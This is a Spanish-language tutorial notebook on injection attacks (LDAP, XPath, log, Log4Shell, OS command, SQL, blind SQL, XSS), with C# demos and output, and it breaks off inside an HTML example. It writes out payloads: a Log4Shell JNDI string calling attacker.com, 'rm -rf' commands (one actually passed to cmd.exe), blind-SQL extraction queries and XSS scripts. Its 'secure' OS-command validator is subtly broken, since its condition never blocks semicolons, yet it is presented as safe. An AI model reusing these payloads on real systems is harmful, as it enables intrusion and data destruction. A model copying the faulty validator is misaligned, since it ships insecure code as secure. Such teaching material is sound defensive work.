
Las inyecciones representan una de las vulnerabilidades más comunes y peligrosas en las aplicaciones web. Consisten en la inserción de código malicioso o no deseado en una aplicación vulnerable, con el objetivo de alterar su funcionamiento previsto. Este tipo de ataque puede ocurrir cuando una aplicación no valida o desinfecta correctamente los datos introducidos por los usuarios, lo que permite a un atacante ejecutar comandos maliciosos, obtener acceso no autorizado a datos, o incluso comprometer la seguridad del sistema.

## INYECCIONES LDAP

### Descripción

Una inyección LDAP (Lightweight Directory Access Protocol) es un tipo de ataque que aprovecha vulnerabilidades en las consultas LDAP de una aplicación para manipular o modificar los datos enviados a un servidor de directorio. Al igual que las inyecciones SQL, las inyecciones LDAP ocurren cuando las entradas de usuario no se validan ni desinfectan adecuadamente, permitiendo que un atacante inserte comandos o filtros LDAP maliciosos en las consultas.

El protocolo LDAP se utiliza comúnmente para acceder y gestionar información en directorios como Active Directory, que contienen datos sobre usuarios, dispositivos y otros recursos de red. Un atacante puede aprovechar una vulnerabilidad de inyección LDAP para:

Acceder a información no autorizada dentro del servidor de directorio.
Modificar datos en el directorio.
Bypass de autenticación para obtener acceso a recursos o cuentas restringidas.
Ejecutar operaciones no deseadas que comprometan la seguridad del sistema.

### Ejemplo de Inyección LDAP

`(&(uid=usuario)(password=clave))`

Si la aplicación no valida correctamente la entrada del usuario, un atacante podría introducir una cadena manipulada como:

`(&(uid=usuario)(&))(password=clave)`

En este caso, la consulta resultante siempre será verdadera, permitiendo que el atacante eluda la autenticación.

### Prevención
Para mitigar los riesgos de una inyección LDAP, es importante:

- Validar y desinfectar las entradas del usuario antes de utilizarlas en consultas LDAP.
- Usar consultas LDAP parametrizadas, lo que reduce la posibilidad de manipulación de los parámetros.
- Restringir los permisos de las aplicaciones en el servidor de directorios, limitando el acceso a solo la información necesaria.

### Code example 1.1

In [2]:
#r "nuget: System.DirectoryServices"

using System;
using System.Text.RegularExpressions;
using System.DirectoryServices;

public class LdapHelper
{
    // Patrón de expresión regular para validar entradas LDAP
    private static readonly string ldapSafePattern = @"^[a-zA-Z0-9\-_]+$";

    // Método para validar la entrada
    public static bool IsValidLdapInput(string input)
    {
        return Regex.IsMatch(input, ldapSafePattern);
    }

    // Método para realizar la búsqueda LDAP
    public static void SearchLdap(string username, string password)
    {
        // Validación de la entrada
        if (!IsValidLdapInput(username) || !IsValidLdapInput(password))
        {
            throw new ArgumentException("Invalid input detected. Input contains unsafe characters.");
        }

        // Configuración de conexión LDAP (ejemplo)
        string ldapPath = "LDAP://your-ldap-server.com";
        using (DirectoryEntry directoryEntry = new DirectoryEntry(ldapPath))
        {
            // Autenticación con las credenciales proporcionadas
            directoryEntry.Username = username;
            directoryEntry.Password = password;

            try
            {
                // Intentar enlazar para validar las credenciales
                DirectorySearcher searcher = new DirectorySearcher(directoryEntry)
                {
                    Filter = $"(&(uid={username})(userPassword={password}))"
                };
                SearchResult result = searcher.FindOne();

                if (result != null)
                {
                    Console.WriteLine("User authenticated successfully.");
                }
                else
                {
                    Console.WriteLine("Invalid username or password.");
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine($"LDAP error: {ex.Message}");
            }
        }
    }
}
Console.WriteLine(DateTime.Now.ToString());

Console.Write("Is alumno valid? ");
if (LdapHelper.IsValidLdapInput("alumno") == true)
    Console.WriteLine("Yes");
else
    Console.WriteLine("No");

Console.Write("Is 123abc. valid? ");
if (LdapHelper.IsValidLdapInput("123abc.") == true)
    Console.WriteLine("Yes");
else
    Console.WriteLine("No");

Console.Write("Is user123)(|(uid=*)) valid? ");
if (LdapHelper.IsValidLdapInput("user123)(|(uid=*))") == true)
    Console.WriteLine("Yes");
else
    Console.WriteLine("No");


Installed Packages System.DirectoryServices, 8.0.0

10/22/2024 08:53:21
Is alumno valid? Yes
Is 123abc. valid? No
Is user123)(|(uid=*)) valid? No


En el caso de `"user123)(|(uid=*))"` se trata de un ataque donde:

- `user123)`: El uso de ) aquí cierra una expresión LDAP prematuramente, interrumpiendo la estructura lógica de la consulta original.
- `(|(uid=*))`: (| ...) es un operador lógico OR en LDAP. (uid=*) significa "cualquier entrada que tenga un atributo uid" (es decir, todas las entradas donde el atributo uid esté presente, sin importar su valor).


### Más información

- https://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf
- https://www.exploit-db.com/docs/spanish/21315-[spanish]-taller-de-inyecciones-ldap.pdf


## INYECCIONES XPATH

La inyección XPath (XPath Injection) es un tipo de ataque que aprovecha las consultas XPath en aplicaciones web para manipular las consultas que se realizan a un documento XML. Al igual que las inyecciones SQL, el atacante puede alterar la estructura de la consulta XPath mediante entradas maliciosas, lo que le permite acceder a datos no autorizados o eludir autenticaciones.

**¿Qué es XPath?**

XPath (XML Path Language) es un lenguaje utilizado para navegar por elementos y atributos dentro de documentos XML. Permite realizar consultas a estructuras XML para extraer datos específicos.

Un ejemplo básico de consulta XPath podría ser:
`//users/user[username='admin' and password='123abc.']`

Esta consulta busca un nodo user con un username igual a "admin" y una password igual a "123abc.".

**¿Cómo ocurre la inyección XPath?**

En una inyección XPath, el atacante introduce caracteres maliciosos en la entrada de usuario que se utilizan para formar una consulta XPath. Si la entrada no es validada o saneada correctamente, la consulta XPath puede ser alterada de manera que extraiga información no deseada o acceda a áreas restringidas.

Ejemplo de una inyección XPath en una autenticación
Supongamos que se tiene un formulario de autenticación donde el usuario ingresa su nombre de usuario y contraseña, y que el código de la aplicación construye una consulta XPath así:

`query = f"//users/user[username='{username}' and password='{password}']"`

Si un usuario ingresa algo como:

Usuario: ' or '1'='1
Contraseña: ' or '1'='1
La consulta XPath que se generaría sería:

`//users/user[username='' or '1'='1' and password='' or '1'='1']`

**Consecuencias del ataque**

En este caso, la parte or '1'='1' siempre evalúa como verdadera, por lo que la consulta devolverá todos los nodos user, o el primer usuario que encuentre en el documento XML. Esto puede permitir al atacante eludir el proceso de autenticación sin proporcionar credenciales válidas.

Impacto de la inyección XPath
Eludir la autenticación: Un atacante podría obtener acceso a una aplicación sin conocer credenciales válidas.
Acceso no autorizado a datos sensibles: Si la inyección permite modificar consultas XPath, el atacante puede acceder a datos XML confidenciales que de otro modo no estarían accesibles.
Compromiso de la integridad del sistema: Si se permite una inyección masiva de comandos, el atacante podría alterar el comportamiento de la aplicación.

**Prevención de inyección XPath**
Para evitar ataques de inyección XPath, se pueden tomar las siguientes medidas:

Validar las entradas de usuario: Se debe validar estrictamente cualquier entrada proporcionada por el usuario antes de usarla en una consulta XPath.
Escapar caracteres especiales: Escapar o restringir caracteres como comillas (', ") y operadores lógicos (or, and).
Usar parámetros predefinidos: Al igual que en las inyecciones SQL, se deben utilizar consultas parametrizadas o construcciones seguras que eviten la concatenación directa de datos proporcionados por el usuario.
Librerías seguras: Utilizar librerías o marcos de trabajo que proporcionen mecanismos seguros para trabajar con consultas XPath.



## Code example 1.2

In [3]:
using System;
using System.Xml;
using System.Xml.XPath;
using System.Text.RegularExpressions;

public class XPathInjectionDemo
{
    // Patrón de validación seguro para las entradas de XPath
    private static readonly string xpathSafePattern = @"^[a-zA-Z0-9]+$";

    // Método para validar la entrada del usuario
    public static bool IsValidXPathInput(string input)
    {
        return Regex.IsMatch(input, xpathSafePattern);
    }

    // Método para ejecutar la consulta XPath segura
    public static void SafeXPathQuery(string username, string password)
    {
        // Validación de las entradas de usuario
        if (!IsValidXPathInput(username) || !IsValidXPathInput(password))
        {
            Console.WriteLine("Invalid input detected. Potential XPath injection.");
            return;
        }

        // Cargar el archivo XML (o puede venir de una base de datos, etc.)
        string xmlData = @"
        <users>
            <user>
                <username>admin</username>
                <password>1234</password>
            </user>
            <user>
                <username>user1</username>
                <password>abcd</password>
            </user>
        </users>";

        XmlDocument xmlDocument = new XmlDocument();
        xmlDocument.LoadXml(xmlData);

        // Construir consulta XPath de forma segura
        string xPathQuery = $"/users/user[username='{username}' and password='{password}']";

        // Ejecutar consulta XPath
        XmlNode userNode = xmlDocument.SelectSingleNode(xPathQuery);

        if (userNode != null)
        {
            Console.WriteLine("User authenticated successfully.");
        }
        else
        {
            Console.WriteLine("Invalid username or password.");
        }
    }
}
// Ejemplos de uso legítimo
Console.WriteLine("Validating safe input:");
XPathInjectionDemo.SafeXPathQuery("admin", "1234");   // Consulta válida, usuario y contraseña correctos
XPathInjectionDemo.SafeXPathQuery("user1", "abcd");   // Consulta válida, usuario y contraseña correctos

// Ejemplo de uso malicioso (intento de inyección XPath)
Console.WriteLine("\nAttempting an XPath injection:");
XPathInjectionDemo.SafeXPathQuery("user1' or '1'='1", "anything");   // Este intento de inyección será detectado y bloqueado
XPathInjectionDemo.SafeXPathQuery("admin", "1234' or '1'='1");       // Intento de manipular la contraseña, también será bloqueado


Validating safe input:
User authenticated successfully.
User authenticated successfully.

Attempting an XPath injection:
Invalid input detected. Potential XPath injection.
Invalid input detected. Potential XPath injection.


En el caso de uso `"user1' or '1'='1"` es un atque porque:

- Se ejecuta una condición (1 = 1) que se cumple siempre, devolviendo todos los nodos de esa rama.

# Inyecciones de log

La inyección de logs (log injection) es una vulnerabilidad que ocurre cuando las entradas proporcionadas por un usuario no se sanitizan adecuadamente y 
se escriben directamente en archivos de registro (logs). Un atacante puede explotar esta vulnerabilidad para alterar el contenido de los registros, inyectar información maliciosa o incluso ejecutar ataques más complejos como inyección de código o ataques de ingeniería social.

**¿Cómo funciona la inyección de logs?*
En muchos sistemas, las aplicaciones registran eventos, errores y otros datos en archivos de log para monitoreo o auditoría. Si las entradas del usuario (como nombres, correos, mensajes de error, etc.) se registran sin validación, un atacante puede incluir caracteres o secuencias especiales para manipular el contenido del log.

Ejemplos de ataques de inyección de logs:
1. *Alteración de registros:* Un atacante puede insertar caracteres especiales (como saltos de línea o símbolos) para dividir las entradas del registro, hacer que las líneas se vean desorganizadas o incluso crear entradas falsas.

Ejemplo:

```
Usuario legítimo: user123
Usuario malicioso: attacker\n[ERROR] Intento de autenticación fallido para admin
```
Si este dato se registra sin sanitización, puede parecer en el log como:
```
[INFO] Autenticación exitosa para usuario: user123
[INFO] Autenticación exitosa para usuario: attacker
[ERROR] Intento de autenticación fallido para admin
```

2. *Ataques de inyección de código:* En algunos casos, el log puede ser leído o procesado por otros sistemas o scripts automatizados. Un atacante podría inyectar secuencias de código que, cuando sean leídas o procesadas, desencadenen la ejecución de comandos maliciosos.

Ejemplo:

```
Usuario malicioso: attacker; rm -rf /important-data
```
Si esta entrada no es validada y se ejecuta en un script que procesa logs, podría resultar en la eliminación de datos críticos.

3. *Ataques de ingeniería social: Un atacante podría inyectar contenido falso en los logs para engañar a los administradores o inducirlos a tomar decisiones incorrectas, como pensar que un sistema ha sido comprometido o que se ha producido un error crítico.

Ejemplo:

```
Usuario malicioso: attacker\n[CRITICAL] Error en la base de datos, se perdió información
```
En el log, esto aparecería como si hubiera ocurrido un fallo crítico, cuando en realidad solo fue una manipulación.

**Consecuencias de la inyección de logs:**
- Confusión en la monitorización y auditoría: Los registros son una fuente crucial de información para la detección de fallos y auditorías de seguridad. Si se inyectan datos falsos o manipulados, los administradores podrían perder la capacidad de realizar diagnósticos precisos.

- Elusión de la detección de ataques: Un atacante puede alterar o insertar entradas en los logs para ocultar actividades maliciosas, dificultando la detección de intrusiones o errores.

- Ejecución de comandos maliciosos: En algunos casos, la inyección de logs puede desencadenar la ejecución de scripts o comandos, dependiendo de cómo se procesan los logs por otras herramientas.

**Prevención de la inyección de logs:**

1. *Sanitización de entradas:* Las entradas del usuario deben ser sanitizadas antes de registrarse en los archivos de log. Esto puede incluir la eliminación o codificación de caracteres especiales como saltos de línea, comillas o caracteres de escape.

2. *Escapar caracteres peligrosos:* Asegurarse de que cualquier cadena que se registre en el log no contenga secuencias de escape que puedan alterar el formato del archivo de log o que afecten a su procesamiento posterior.

3. *Validación de la entrada del usuario:* Antes de escribir cualquier dato en el log, se debe validar la entrada para asegurarse de que no contenga secuencias maliciosas.

4. *Uso de sistemas de log robustos:* Utilizar frameworks de registro de logs que tengan mecanismos integrados para evitar la inyección, como codificación automática de entradas.

### Code Example 1.3

In [1]:

using System;
using System.Text.RegularExpressions;

public class LogHelper
{
    // Patrón para validar entradas de log
    private static readonly string safeLogPattern = @"^[a-zA-Z0-9\s]+$";

    // Método para sanitizar entradas de log
    public static string SanitizeForLog(string input)
    {
        if (Regex.IsMatch(input, safeLogPattern))
        {
            return input;
        }
        else
        {
            // Reemplazar caracteres peligrosos
            return Regex.Replace(input, @"[\r\n\t]", " ");
        }
    }

    // Método para registrar entradas en el log
    public static void LogEvent(string message)
    {
        // Sanitizar la entrada antes de registrarla
        string sanitizedMessage = SanitizeForLog(message);

        // Guardar la entrada en el log (ejemplo)
        Console.WriteLine($"[INFO] {sanitizedMessage}");
    }
}

// Uso legítimo
LogHelper.LogEvent("Usuario autenticado: admin");

// Intento de inyección
LogHelper.LogEvent("attacker\n[ERROR] Intento de autenticación fallido para admin");



The below script needs to be able to find the current output cell; this is an easy method to get it.

[INFO] Usuario autenticado: admin
[INFO] attacker [ERROR] Intento de autenticación fallido para admin


### Log4Shell (Log4j exploit)

El ataque de Log4j explotó una vulnerabilidad conocida como Log4Shell, que se basa en la inyección de una expresión de búsqueda de Java (JNDI, Java Naming and Directory Interface). Este ataque permitió a los atacantes ejecutar código arbitrario en servidores vulnerables al realizar registros (logs) con datos maliciosos controlados por el usuario.

Concepto de la vulnerabilidad Log4Shell:
En Log4j, el problema radicaba en que las entradas de log podían ser interpretadas como comandos, permitiendo a los atacantes inyectar cadenas maliciosas que invocaban recursos remotos mediante JNDI, lo que llevaba a la ejecución de código remoto (RCE, Remote Code Execution).

La cadena maliciosa típica era algo como:

`${jndi:ldap://attacker.com/exploit}`

Esta cadena indicaba que Log4j debía contactar un servidor LDAP externo, y luego ejecutar código potencialmente malicioso proporcionado por el atacante.

## Inyecciones de OS command

Las inyecciones de comandos del sistema operativo (OS Command Injection) son un tipo de vulnerabilidad de seguridad que permite a un atacante ejecutar comandos arbitrarios en el sistema operativo subyacente a través de una aplicación. Esto ocurre cuando una aplicación recibe entradas no validadas y las utiliza para construir comandos del sistema operativo que se ejecutan en el servidor. Si no se implementan medidas adecuadas de validación y sanitización, un atacante puede manipular la entrada para ejecutar comandos maliciosos.

**Cómo funcionan las inyecciones de OS Command**
1. *Entrada del usuario:* Una aplicación recibe datos de entrada del usuario que se utilizan para construir un comando del sistema operativo.

2. *Falta de validación:* Si la aplicación no valida ni sanitiza adecuadamente la entrada, un atacante puede inyectar caracteres especiales o comandos adicionales que alteran la ejecución original.

3. *Ejecución del comando:* La aplicación ejecuta el comando, que incluye la inyección del atacante, permitiendo que este último ejecute cualquier comando del sistema operativo.

**Ejemplo de inyección de comandos**

Imaginando una aplicación que permite a los usuarios consultar la información de un archivo en el servidor, podría tener un código similar al siguiente (en pseudocódigo):

```
userInput = getUserInput()  // Ejemplo: "file.txt"
command = "cat " + userInput
executeCommand(command)
```
Si un atacante proporciona una entrada como file.txt; rm -rf /, el comando resultante sería:
```
cat file.txt; rm -rf /
```
**Medidas de mitigación**

Para prevenir las inyecciones de comandos del sistema operativo, se pueden implementar varias estrategias:

1. *Validación de entradas:* Validar y restringir las entradas del usuario para asegurarse de que solo se permiten caracteres y formatos esperados.

2. *Uso de APIs seguras:* Utilizar APIs que no permitan la ejecución de comandos del sistema operativo directamente. Por ejemplo, en lugar de ejecutar comandos a través de la línea de comandos, usar bibliotecas que proporcionen las funcionalidades requeridas.

3. *Escapado de entradas:* Si es necesario ejecutar comandos, escapar adecuadamente las entradas del usuario para evitar que se interpreten como parte del comando.

4. *Principio de menor privilegio:* Ejecutar aplicaciones con los privilegios más bajos posibles para limitar el daño potencial en caso de que se produzca una inyección.

5. *Auditoría y monitoreo:* Implementar registros y auditorías para detectar y responder a actividades sospechosas que podrían indicar intentos de inyección.


### Code example 1.4

In [11]:
using System;
using System.Diagnostics;

public class OsCommandInjectionDemo
{
    // Método inseguro que permite la inyección de comandos
    public static bool InsecureCommandExecution(string userInput)
    {
        // Comando potencialmente vulnerable a inyección
        string command = "cmd.exe /C dir " + userInput;
        
        // Ejecución del comando
        Process.Start(new ProcessStartInfo
        {
            FileName = "cmd.exe",
            Arguments = "/C " + command,
            RedirectStandardOutput = true,
            UseShellExecute = false,
            CreateNoWindow = true
        });
        return true;
    }

    // Método seguro que mitiga la inyección de comandos
    public static bool SecureCommandExecution(string userInput)
    {
        // Validación de entrada
        if (!IsValidInput(userInput))
        {
            Console.WriteLine("Invalid input detected.");
            return false;
        }

        // Comando seguro
        string command = "cmd.exe /C dir " + userInput;

        // Ejecución del comando
        Process.Start(new ProcessStartInfo
        {
            FileName = "cmd.exe",
            Arguments = "/C " + command,
            RedirectStandardOutput = true,
            UseShellExecute = false,
            CreateNoWindow = true
        });
        return true;
    }

    // Método para validar la entrada del usuario
    private static bool IsValidInput(string input)
    {
        // Se permite solo caracteres alfanuméricos y espacios
        foreach (char c in input)
        {
            if (c ==' ' ||  c == '&' || c == '|' ||  c == ';' && c == '-')
            {
                return false; // Entrada no válida
            }
        }
        return true; // Entrada válida
    }
}
Console.WriteLine("Ejemplo de inyección de comandos del sistema operativo:");

// Intento de inyección (peligroso)
Console.WriteLine("\nEjecutando comando inseguro:");
if ( OsCommandInjectionDemo.InsecureCommandExecution("C:\\Windows\\System32; rm -rf C:\\")) // Potencial inyección
{
    Console.WriteLine("Comando ejecutado con éxito un comando malicioso");
}
// Uso seguro
Console.WriteLine("\nEjecutando comando seguro:");
if (OsCommandInjectionDemo.SecureCommandExecution("ls -l /var/lib && rm -Rf c:\\")==false) // Ejecución segura
{
    Console.WriteLine("Detectado y parado el intento de inyección de comandos");
}


Ejemplo de inyección de comandos del sistema operativo:

Ejecutando comando inseguro:


Comando ejecutado con éxito un comando malicioso

Ejecutando comando seguro:
Invalid input detected.
Detectado y parado el intento de inyección de comandos


## Inyeccion SQL

Las inyecciones SQL son un tipo de ataque en el que un atacante puede ejecutar código SQL malicioso en una base de datos a través de una entrada manipulada. Este tipo de vulnerabilidad ocurre cuando una aplicación web incluye datos no validados o no sanitizados en una consulta SQL. A continuación, se explican los aspectos clave de las inyecciones SQL:

**¿Cómo Ocurren las Inyecciones SQL?**
Entrada de Usuario No Validada: Cuando una aplicación permite a los usuarios enviar datos (como formularios o URL) sin validar o sanitizar adecuadamente esos datos, se corre el riesgo de inyección SQL.

Con
strucción de Consultas SQL: Si los datos ingresados se concatenan directamente en una consulta SQL sin ninguna validación, un atacante puede incluir código SQL adicional. Por ejemplo, en lugar de enviar solo un nombre de usuario, un atacante puede enviar una cadena diseñada para alterar la lógica de la consulta.

Ejemplo de Ataque de Inyección SQL
Imaginemos una consulta SQL simple que busca un usuario en la base de datos:
```sql
SELECT * FROM users WHERE username = 'input_usuario' AND password = 'input_password';
```
Si un atacante introduce el siguiente valor para input_usuario:
`' OR '1'='1'`
La consulta resultante sería:
```sql
SELECT * FROM users WHERE username = '' OR '1'='1' AND password = 'input_password';
```
Dado que '1'='1' siempre es verdadero, el atacante podría acceder a los datos de la tabla users sin proporcionar credenciales válidas.

**Consecuencias de las Inyecciones SQL**

- *Acceso No Autorizado:* Los atacantes pueden acceder a datos sensibles, como contraseñas, información personal y registros financieros.
- *Modificación de Datos:* Un atacante puede modificar, eliminar o insertar datos en la base de datos.
- *Destrucción de Datos:* En algunos casos, los atacantes pueden borrar tablas completas o incluso bases de datos enteras.
- *Ejecutar Comandos del Sistema:* En bases de datos más vulnerables, es posible ejecutar comandos del sistema operativo.

**Prevención de Inyecciones SQL**

1. *Uso de Sentencias Preparadas*: Utilizar sentencias preparadas y consultas parametrizadas. Esto asegura que los datos del usuario se traten como parámetros en lugar de código SQL ejecutable.

```c#
using (SqlCommand command = new SqlCommand("SELECT * FROM users WHERE username = @username AND password = @password", connection))
{
    command.Parameters.AddWithValue("@username", input_usuario);
    command.Parameters.AddWithValue("@password", input_password);
}
```
2. *Validación y Sanitización de Entradas:* Validar y sanitizar todos los datos de entrada. Esto incluye verificar el tipo de datos y el formato esperado.

3. *Uso de ORM:* Utilizar un marco de trabajo de acceso a datos que implemente automáticamente medidas de seguridad contra inyecciones SQL, como Entity Framework en .NET.
4. *Uso de procedimientos almacenados* En los procedimientos almacenados y funciones se utilizan parámetros. Todas las bases de datos protegen de ejecuciones maliciosas por inyecciones en los parámetros

4. *Principio de Mínimos Privilegios:* Limitar los permisos de la cuenta de base de datos utilizada por la aplicación para que solo tenga acceso a las operaciones necesarias.

5. *Monitoreo y Registro:* Monitorear y registrar el acceso a la base de datos para detectar y responder a comportamientos sospechosos.


### Code Example 1.6

**Preparación**

1. Crear el contenedor de base de datos usando el shell de linux

```sh
sudo docker run --name postgres -e POSTGRES_PASSWORD=123abc. -p 5432:5432 --restart=always -d postgres
```

2. Ejecutar las siguientes líneas de comandos en el shell de linux

```sh
cd owasp/injections/resources
sudo sh init-postgres-docker.sh
```




In [20]:
#r "nuget: Npgsql"
using System;
using Npgsql; // Asegúrate de incluir la referencia a Npgsql

class SqlInjectionDemo
{
    // Método que demuestra una consulta SQL inyectable
    public static void ExecuteInsecureQuery(string userInput)
    {
        string query = "SELECT * FROM users WHERE username = '" + userInput + "';";

        using (var connection = new NpgsqlConnection(connectionString))
        {
            var command = new NpgsqlCommand(query, connection);

            try
            {
                connection.Open();
                using (var reader = command.ExecuteReader())
                {
                    // Procesar los resultados de la consulta
                    while (reader.Read())
                    {
                        Console.WriteLine("Usuario encontrado: " + reader["username"]);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error en la consulta inyectable: " + ex.Message);
            }
        }
    }

    // Método que demuestra una consulta SQL segura
    public static void ExecuteSecureQuery(string userInput)
    {
        string query = "SELECT * FROM users WHERE username = @username;";

        using (var connection = new NpgsqlConnection(connectionString))
        {
            var command = new NpgsqlCommand(query, connection);
            command.Parameters.AddWithValue("@username", userInput);

            try
            {
                connection.Open();
                using (var reader = command.ExecuteReader())
                {
                    // Procesar los resultados de la consulta
                    while (reader.Read())
                    {
                        Console.WriteLine("Usuario encontrado: " + reader["username"]);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error en la consulta segura: " + ex.Message);
            }
        }
    }
}


private static string connectionString = "Host=127.0.0.1;Port=5432;Database=test;Username=postgres;Password=123abc.;";

// Ejemplo de inyección SQL
Console.WriteLine("Ejemplo de ejecución SQL inyectable:");
string userInput = "' OR '1'='1"; // Entrada de usuario maliciosa para devolver todos los datos de la tabla users
SqlInjectionDemo.ExecuteInsecureQuery(userInput);

Console.WriteLine("Ejemplo de ejecución SQL inyectable segura:");
string userInputI = "' OR '1'='1"; // Entrada de usuario maliciosa para devolver todos los datos de la tabla users
SqlInjectionDemo.ExecuteSecureQuery(userInputI);

// Ejemplo seguro con parámetros
Console.WriteLine("\nEjemplo de ejecución SQL no inyectable:");
string safeUserInput = "user1"; // Entrada de usuario segura
SqlInjectionDemo.ExecuteSecureQuery(safeUserInput);


Installed Packages Npgsql, 8.0.5

Ejemplo de ejecución SQL inyectable:
Usuario encontrado: user1
Usuario encontrado: user2
Usuario encontrado: user3
Usuario encontrado: user4
Usuario encontrado: user5
Usuario encontrado: user6
Usuario encontrado: user7
Usuario encontrado: user8
Usuario encontrado: user9
Usuario encontrado: user10
Ejemplo de ejecución SQL inyectable segura:

Ejemplo de ejecución SQL no inyectable:
Usuario encontrado: user1


### Inyección SQL Ciega (Blind)

La inyección SQL ciega (Blind SQL Injection) es un tipo de ataque en el que un atacante puede obtener información de la base de datos de una aplicación web sin ver directamente los resultados de las consultas. Esto ocurre cuando la aplicación no muestra los resultados de la consulta SQL al usuario, pero el atacante puede inferir información a través de las respuestas de la aplicación (como tiempos de respuesta, mensajes de error o comportamientos).

**Tipos de Inyección SQL Ciega**

1. Ciega basada en Booleanos: En este tipo, el atacante realiza consultas que devuelven resultados verdaderos o falsos. Por ejemplo, se podría preguntar si el primer carácter de una contraseña es una letra específica. Dependiendo de la respuesta de la aplicación (que puede ser un comportamiento diferente o un mensaje de error), el atacante puede deducir si la afirmación es verdadera o falsa.

2. Ciega basada en Tiempos: Aquí, el atacante inyecta consultas que hacen que la base de datos se retrase antes de responder. Por ejemplo, una consulta puede incluir una condición que, si se cumple, hará que la base de datos espere un tiempo determinado antes de responder. Al medir el tiempo de respuesta, el atacante puede inferir si la condición fue verdadera o falsa.

**Ejemplo de Inyección SQL Ciega**
A continuación se presenta un ejemplo en C# que ilustra cómo podría implementarse un ataque de inyección SQL ciega utilizando consultas basadas en booleanos. Este código es solo para fines educativos y no debe ser utilizado en un entorno de producción.

```c#
using System;
using Npgsql; // Asegúrate de incluir la referencia a Npgsql

class BlindSqlInjectionDemo
{
    // Cadena de conexión a la base de datos PostgreSQL (ajustar según sea necesario)
    private static string connectionString = "Host=your_host;Port=5432;Database=your_database;Username=your_user;Password=your_password;";

    public static void Main(string[] args)
    {
        string userInput = "admin' AND (SELECT SUBSTRING(password, 1, 1) FROM users WHERE username='admin') = 'a' --"; // Inyección de ejemplo
        ExecuteBlindSqlInjection(userInput);
    }

    // Método que demuestra una inyección SQL ciega
    public static void ExecuteBlindSqlInjection(string userInput)
    {
        string query = "SELECT * FROM users WHERE username = '" + userInput + "';";

        using (var connection = new NpgsqlConnection(connectionString))
        {
            var command = new NpgsqlCommand(query, connection);

            try
            {
                connection.Open();
                // Aquí no se espera un resultado que se imprima
                command.ExecuteNonQuery(); // Solo ejecuta la consulta
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error en la inyección SQL ciega: " + ex.Message);
            }
        }
    }
}

```


**Medidas de Mitigación**

Para protegerse contra la inyección SQL ciega y otros tipos de inyección SQL, se recomienda implementar las siguientes prácticas:

1. *Uso de Consultas Parametrizadas:* Siempre utilizar consultas parametrizadas o procedimientos almacenados en lugar de concatenar cadenas.
2. *Validación de Entradas:* Validar y sanitizar todas las entradas del usuario.
3. *Principio de Menor Privilegio:* Configurar las cuentas de base de datos con el menor privilegio necesario para las operaciones.
4. *Manejo de Errores:* No mostrar mensajes de error detallados al usuario final, ya que pueden proporcionar pistas sobre la estructura de la base de datos.

### Proceso de recuperación del esquema de base de datos con inyección SQL ciega

1. *Obtener Nombres de Tablas Letra por Letra:* Luego, el atacante puede usar inyección ciega para descubrir el nombre de las tablas letra por letra. Por ejemplo, para la primera tabla:

Un ejemplo sería para cada letra:

`' OR (SELECT SUBSTRING(table_name, 1, 1) FROM information_schema.tables WHERE table_schema = 'public' LIMIT 1 OFFSET 0) = 'u' -- `

Esta consulta comprueba si la primera letra de la primera tabla es 'u'. El proceso se repite para la segunda letra

`' OR (SELECT SUBSTRING(table_name, 2, 1) FROM information_schema.tables WHERE table_schema = 'public' LIMIT 1 OFFSET 0) = 's' -- `

y así sucesivamente hasta descubir el nombre completo. Recordar que solamente con el nombre completo se obtendrá una respuesta positiva

2. *Obtener el Nombre de las Columnas de una Tabla:* Una vez que se ha obtenido el nombre de la tabla, el atacante puede recuperar las columnas de forma similar. 

Para la primera letra del campo:

`' OR (SELECT SUBSTRING(column_name, 1, 1) FROM information_schema.columns WHERE table_name = 'users' LIMIT 1 OFFSET 0) = 'p' -- `

Para la segunda letra:

`' OR (SELECT SUBSTRING(column_name, 2, 1) FROM information_schema.columns WHERE table_name = 'users' LIMIT 1 OFFSET 0) = 'a' --`

y así sucesivamente hasta descubir el nombre completo.



## Inyecciones XSS

La inyección de tipo XSS (Cross-Site Scripting) es una vulnerabilidad de seguridad que permite a un atacante inyectar scripts maliciosos en páginas web vistas por otros usuarios. Esta técnica se basa en que las aplicaciones web no validan ni desinfectan adecuadamente las entradas del usuario, lo que permite que el contenido no confiable se ejecute en el navegador del cliente.

**Tipos de Inyección XSS**

1. *XSS Reflejado:* El script malicioso se refleja en la respuesta del servidor. Este tipo de ataque ocurre cuando un atacante envía un enlace con un script malicioso como parte de una solicitud, y el servidor lo incluye en la respuesta sin desinfectar.

```javascript
<script>alert('XSS Reflejado');</script>
```
En este caso se ha logrado que el servidor devuelva código en forma de script malicioso y que se ejecute usando jacascript

2. *XSS Persistente:* El script malicioso se almacena en el servidor, como en una base de datos, y se envía a los navegadores de los usuarios cada vez que acceden a la página afectada.

```javascript
<script>document.cookie='session=malicious';</script>
```
De alguna manera se ha logrado introducir este script malicioso en bbdd y se ha compuesto la página que incluye este código

3. *XSS DOM-Based:* El script malicioso se ejecuta directamente en el navegador del cliente al modificar el DOM de la página, a menudo sin necesidad de comunicación con el servidor.

```javascript
var userInput = window.location.hash; // Un atacante puede manipular la URL
eval(userInput); // Ejecuta el código malicioso
```

**Consecuencias de XSS**

- *Robo de Cookies:* Un atacante puede robar cookies de sesión, lo que permite el secuestro de cuentas.
- *Redirección a Sitios Maliciosos:* Los usuarios pueden ser redirigidos a sitios que intentan robar información.
- *Carga de Malware:* Puede cargar y ejecutar malware en el sistema del usuario.
- *Phishing:* Puede presentar formularios de phishing que capturan información sensible.

**Medidas de Mitigación**

1. *Escapar y Validar Entradas:* Asegurarse de que todas las entradas del usuario se escapen y validen correctamente. Esto incluye el uso de funciones de escape en el contexto apropiado (HTML, JavaScript, CSS).

2. *Política de Seguridad de Contenido (CSP):* Implementar una CSP que limite los scripts que se pueden ejecutar en la página.

3. *No Permitir Inline Scripts:* Evitar el uso de scripts en línea y en su lugar cargar archivos JavaScript desde fuentes confiables.

4. *Revisión de Código:* Realizar auditorías y revisiones de código para detectar posibles vulnerabilidades.

5. *Uso de Librerías de Seguridad:* Utilizar bibliotecas que ayuden a mitigar XSS, como OWASP Java Encoder, que proporcionan funciones de escape seguras.

**Ejemplo de Inyección XSS**

```html
<!DOCTYPE html>
<html>
<head>
    <title>XSS Example</title>
</head>
<body>
    <h1>Welcome!</h1>
    <p id="message">
    </p>

    <script>
